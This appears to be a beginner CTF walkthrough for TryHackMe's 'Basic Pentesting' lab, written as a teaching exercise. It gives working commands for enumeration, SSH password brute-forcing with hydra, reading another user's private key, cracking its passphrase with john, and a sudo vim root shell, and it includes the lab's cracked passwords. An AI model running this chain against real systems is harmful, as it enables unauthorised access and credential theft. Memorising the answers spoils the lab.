Basic Pentesting

Difficulty: beginner · Time: 45 min · Writeup

Your first penetration testing experience

Learning Objectives

  • Perform basic enumeration
  • Find and exploit vulnerabilities
  • Escalate privileges
  • Get root flag

Basic Pentesting is your first real hacking machine on TryHackMe. This walkthrough covers the complete methodology: scanning, enumeration, exploitation, and privilege escalation. Follow along to root your first box!

Try First!

Attempt the machine yourself before reading this walkthrough. The struggle is where learning happens. Only use this guide when stuck.

Step 1: Reconnaissance

```bash
# Initial port scan: default top-1000 ports, version probes (-sV), default scripts (-sC)
nmap -sV -sC -oN initial_scan.txt TARGET_IP

# Expected results:
# 22/tcp  open  ssh
# 80/tcp  open  http
# 139/tcp open  netbios-ssn
# 445/tcp open  microsoft-ds (Samba)

# Full port scan in the background; read full_scan.txt once it finishes
# (it reports extra high ports on this box, a Tomcat instance and its AJP
# connector, which this path does not need but you should still note)
nmap -p- -T4 TARGET_IP -oN full_scan.txt &

# Key services found:
# - SSH on 22 (potential entry if we find creds)
# - HTTP on 80 (web app to enumerate)
# - SMB on 139/445 (file shares to check)
```
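The background `-p-` scan only helps if you go back and compare it with the first scan. The script below is an added example (not part of the original walkthrough) that parses two `nmap -oN` files and reports what the full scan found that the initial scan missed, skipping filtered and closed ports that `-oN` also lists. The two scan files it writes are constructed to look like real `-oN` output; the version strings and timings in them are placeholders.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: reconcile the quick
# -sV -sC scan with the background -p- scan so nothing the full scan found
# gets forgotten. Both scan files below are constructed for the demo.

# open_ports FILE: print "port/proto service" for every open port in an
# nmap -oN file. Port lines look like "22/tcp  open  ssh  OpenSSH ..."; the
# STATE check drops filtered/closed ports that -oN also lists.
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { print $1, $3 }' "$1"
}

# new_ports INITIAL FULL: ports open in FULL that INITIAL did not report.
new_ports() {
    open_ports "$2" | while read -r port svc; do
        if ! open_ports "$1" | grep -q "^$port "; then
            printf '%s %s\n' "$port" "$svc"
        fi
    done
}

# write_samples DIR: constructed initial_scan.txt / full_scan.txt shaped like
# real -oN output (version strings and timings are placeholders).
write_samples() {
    cat > "$1/initial_scan.txt" <<'EOF'
# Nmap 7.94 scan initiated as: nmap -sV -sC -oN initial_scan.txt TARGET_IP
Nmap scan report for TARGET_IP
Host is up (0.045s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu (protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
# Nmap done: 1 IP address (1 host up) scanned in 20.12 seconds
EOF
    cat > "$1/full_scan.txt" <<'EOF'
# Nmap 7.94 scan initiated as: nmap -p- -T4 TARGET_IP -oN full_scan.txt
Nmap scan report for TARGET_IP
Host is up (0.045s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
111/tcp  filtered rpcbind
139/tcp  open     netbios-ssn
445/tcp  open     microsoft-ds
8009/tcp open     ajp13
8080/tcp open     http-proxy
# Nmap done: 1 IP address (1 host up) scanned in 312.40 seconds
EOF
}

# Demo on the constructed files. On the box, after `wait` for the background
# nmap: new_ports initial_scan.txt full_scan.txt
demo_dir=$(mktemp -d)
write_samples "$demo_dir"
echo "Open in the full scan but missed by the initial scan:"
new_ports "$demo_dir/initial_scan.txt" "$demo_dir/full_scan.txt"
rm -rf "$demo_dir"
```

Anything `new_ports` prints deserves a targeted `nmap -sV -sC -p PORTS` follow-up, since the `-p-` scan ran without version detection.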

Step 2: Web Enumeration

```bash
# Check the web page
curl http://TARGET_IP
# or open it in a browser. The page itself only says the site is under
# maintenance; the HTML source carries a comment pointing at a "dev note" section

# Directory brute forcing
gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirb/common.txt
# Found: /development

# Check the /development directory (directory listing is enabled)
curl http://TARGET_IP/development/

# Found files with interesting info:
# - dev.txt (two dated notes signed "J" and "K"; K mentions setting up the SMB server)
# - j.txt (K warns J that J's password hash was cracked easily, i.e. a weak password)

# So far we only have initials, J and K. The SMB enumeration in Step 3 turns
# them into the real usernames: jan, kay
```

Username Discovery

Web pages, HTML comments, and stray files often leak names or initials. Turn every one into candidate usernames for SSH brute forcing or SMB/enum4linux checks, and always note names!
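A leaked name is only useful once it is in the form the system uses. The function below is an added example (not from the original walkthrough) that turns the names you collect into a username wordlist in the common Linux and Active Directory formats, ready for `hydra -L` or `enum4linux -u`. The names fed to it in the demo are constructed; on this box the input would be the Jan and Kay from `staff.txt`.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: turn names leaked in
# notes, comments and share contents into a username wordlist. The names in
# the demo are constructed; the formats are the usual Linux/AD conventions.

# username_candidates: reads one "First" or "First Last" name per line on
# stdin and prints lowercase candidates (jan, jdoe, j.doe, ...), de-duplicated
# in first-seen order. A name without a surname (or a bare initial such as
# the "J" in dev.txt) yields only its lowercase form.
username_candidates() {
    tr '[:upper:]' '[:lower:]' | awk '
        NF == 1 { print $1 }
        NF >= 2 {
            f = $1; l = $NF; fi = substr(f, 1, 1)
            print f; print l
            print f "." l; print f l; print f "_" l
            print fi l; print fi "." l; print l fi
        }' | awk '!seen[$0]++'
}

# Demo on constructed input. On the box, feed the names from staff.txt and
# the dev notes and save the output: ... | username_candidates > users.txt
printf 'Jan\nKay\nAda Lovelace\n' | username_candidates
```

Feed the result to `hydra -L users.txt -P ... ssh://TARGET_IP` only after SMB enumeration has trimmed it: every extra username multiplies the brute-force time.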

Step 3: SMB Enumeration

```bash
# Enumerate SMB shares (-N = no password, i.e. an anonymous/null session)
smbclient -L //TARGET_IP -N

# Found shares:
# Anonymous - accessible!
# IPC$

# Connect to the Anonymous share
smbclient //TARGET_IP/Anonymous -N

# List and download files
smb: \> ls
smb: \> get staff.txt
smb: \> exit

# Read the downloaded file
cat staff.txt
# A notice from Kay to staff that name-checks Jan: these are the J and K from dev.txt

# Alternative enumeration: enum4linux also lists the local users (jan, kay) via RID cycling
enum4linux -a TARGET_IP
```

Step 4: SSH Brute Force

```bash
# Usernames: jan, kay. j.txt said J's password is weak, so jan goes first

# On a fresh Kali the wordlist is still compressed:
# sudo gunzip /usr/share/wordlists/rockyou.txt.gz

# Brute force jan's SSH password (-t 4 keeps the number of parallel
# connections low; sshd throttles bursts of unauthenticated connections)
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://TARGET_IP -t 4

# Found: jan:armando

# Alternative with medusa
medusa -h TARGET_IP -u jan -P /usr/share/wordlists/rockyou.txt -M ssh

# Login as jan
ssh jan@TARGET_IP
# Enter the password when prompted
```

Step 5: Initial Access & Enumeration

```bash
# We're in as jan!
whoami
# jan

# Basic enumeration
id
# Check groups

# Look for other users
ls /home/
# Found: jan, kay

# Check kay's directory; read the permissions column: what can jan read?
ls -la /home/kay/
ls -la /home/kay/.ssh/

# kay's SSH private key is readable by everyone
cat /home/kay/.ssh/id_rsa

# Copy the whole key, from the BEGIN line to the END line, to your machine
# and save it as kay_id_rsa

# The key is encrypted (the "Proc-Type: 4,ENCRYPTED" / "DEK-Info" header
# lines say so) - we need to crack the passphrase!
```
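Checking one known directory by hand finds this box's key; a tester usually wants the general version of the check. The script below is an added example (not part of the original walkthrough): it searches a tree for private keys that another user has left readable (matched on content, so misnamed copies are found too) and reads each key's header to tell whether it needs a passphrase before anyone reaches for `ssh2john`. It assumes GNU coreutils (`base64 -d`) as on Kali. The home directory it builds for the demo is constructed; the PEM `Proc-Type` header and the `openssh-key-v1` cipher field it inspects are the real markers.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: generalise the
# "ls -la /home/kay/" step into a search for private keys other users have
# left readable, and check whether each one needs a passphrase before
# reaching for ssh2john. Assumes GNU coreutils (base64 -d). The tree built by
# write_demo_keys is constructed; the key headers are the real markers.

# readable_private_keys DIR: files under DIR readable by "other" whose content
# is a private key (content match, so copies like backup.key are found; *.pub
# is skipped).
readable_private_keys() {
    find "$1" -type f -perm -o=r ! -name '*.pub' 2>/dev/null |
    while read -r f; do
        grep -q -- '-----BEGIN .*PRIVATE KEY-----' "$f" && printf '%s\n' "$f"
    done
    return 0
}

# key_cipher FILE: "none" if the key is unprotected, "pem-encrypted" for a
# legacy PEM key carrying "Proc-Type: 4,ENCRYPTED", otherwise the cipher name
# stored in the openssh-key-v1 header (e.g. aes256-ctr).
key_cipher() {
    if grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
        echo pem-encrypted
    elif grep -q -- '-----BEGIN OPENSSH PRIVATE KEY-----' "$1"; then
        # Decoded header: "openssh-key-v1\0", a length-prefixed cipher name,
        # then the KDF name. The second printable run is the cipher.
        sed -n '/^-----BEGIN OPENSSH/,/^-----END OPENSSH/p' "$1" |
            grep -v -- '^-----' | tr -d '\n' | base64 -d 2>/dev/null |
            head -c 64 | tr -c 'a-zA-Z0-9@.-' '\n' | grep -v '^$' | sed -n 2p
    else
        echo none    # legacy PEM without Proc-Type: plaintext key
    fi
}

# openssh_header CIPHER KDF: the leading bytes of an openssh-key-v1 blob with
# the given cipher and KDF names, base64-encoded. Header only, no key
# material, which is all key_cipher looks at.
openssh_header() {
    fmt="openssh-key-v1\000\000\000\000\\$(printf '%03o' "${#1}")$1\000\000\000\\$(printf '%03o' "${#2}")$2"
    printf "$fmt" | base64
}

# write_demo_keys DIR: a constructed home directory with the classic mistake
# (a world-readable, passphrase-protected id_rsa), a correctly protected
# unencrypted key, a misnamed encrypted copy, and a public key.
write_demo_keys() {
    mkdir -p "$1/kay/.ssh"
    {
        echo '-----BEGIN RSA PRIVATE KEY-----'
        echo 'Proc-Type: 4,ENCRYPTED'
        echo 'DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF'
        echo
        echo 'placeholderplaceholderplaceholderplaceholderplaceholderplaceholder'
        echo '-----END RSA PRIVATE KEY-----'
    } > "$1/kay/.ssh/id_rsa"
    chmod 644 "$1/kay/.ssh/id_rsa"                  # readable by everyone
    {
        echo '-----BEGIN OPENSSH PRIVATE KEY-----'
        openssh_header none none
        echo '-----END OPENSSH PRIVATE KEY-----'
    } > "$1/kay/.ssh/id_ed25519"
    chmod 600 "$1/kay/.ssh/id_ed25519"              # correct permissions
    {
        echo '-----BEGIN OPENSSH PRIVATE KEY-----'
        openssh_header aes256-ctr bcrypt
        echo '-----END OPENSSH PRIVATE KEY-----'
    } > "$1/kay/backup.key"
    chmod 644 "$1/kay/backup.key"
    echo 'ssh-ed25519 AAAAC3placeholder kay@TARGET' > "$1/kay/.ssh/id_ed25519.pub"
    chmod 644 "$1/kay/.ssh/id_ed25519.pub"
}

# Demo on the constructed tree. On the box: readable_private_keys /home
demo=$(mktemp -d)
write_demo_keys "$demo"
readable_private_keys "$demo" | while read -r k; do
    printf '%s: cipher=%s\n' "${k#$demo/}" "$(key_cipher "$k")"
done
rm -rf "$demo"
```

A key that reports `none` can be used immediately after `chmod 600`; anything else goes through `ssh2john` and `john` as in Step 6.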

Step 6: Privilege Escalation

```bash
# Crack kay's SSH key passphrase
# On your machine:

# Convert to john format (on Kali the script ships as /usr/share/john/ssh2john.py)
ssh2john kay_id_rsa > kay_hash.txt
# or: python3 /usr/share/john/ssh2john.py kay_id_rsa > kay_hash.txt

# Crack with john
john kay_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show kay_hash.txt

# Found passphrase: beeswax

# Set key permissions (ssh refuses a key that is readable by others)
chmod 600 kay_id_rsa

# Login as kay
ssh -i kay_id_rsa kay@TARGET_IP
# Enter the passphrase when prompted

# Now we're kay!
whoami
# kay

# Check sudo permissions. sudo -l asks for kay's login password, which is not
# the key passphrase; if you don't have it, look through kay's home directory
# (hidden files and backups included) before assuming you're stuck
sudo -l
# Kay can run vim as root!

# Escalate to root via vim (:! runs a shell command from inside vim; -c runs
# it at startup so the editor never has to be used interactively)
sudo vim -c ':!/bin/bash'

# We're root!
whoami
# root

# Get the flag
cat /root/root.txt
```

Complete Attack Path

  1. Scan: Nmap reveals SSH, HTTP, SMB
  2. Web Enum: Find /development with the developers' notes
  3. SMB: Anonymous share confirms the users jan and kay
  4. Brute Force: Hydra finds jan's SSH password
  5. Lateral Move: Read kay's SSH key as jan
  6. Crack Key: John cracks the key passphrase
  7. Root: Vim sudo escape to root

Knowledge Check


What tool was used to brute force SSH credentials?

Key Takeaways

  • Always do thorough port scanning - services reveal attack vectors
  • Web directories often contain sensitive information
  • SMB anonymous shares may leak credentials or usernames
  • A private key readable by other users is a lateral-movement path; a weak passphrase only slows the attacker down (ssh2john + john)
  • sudo -l is essential for privilege escalation enumeration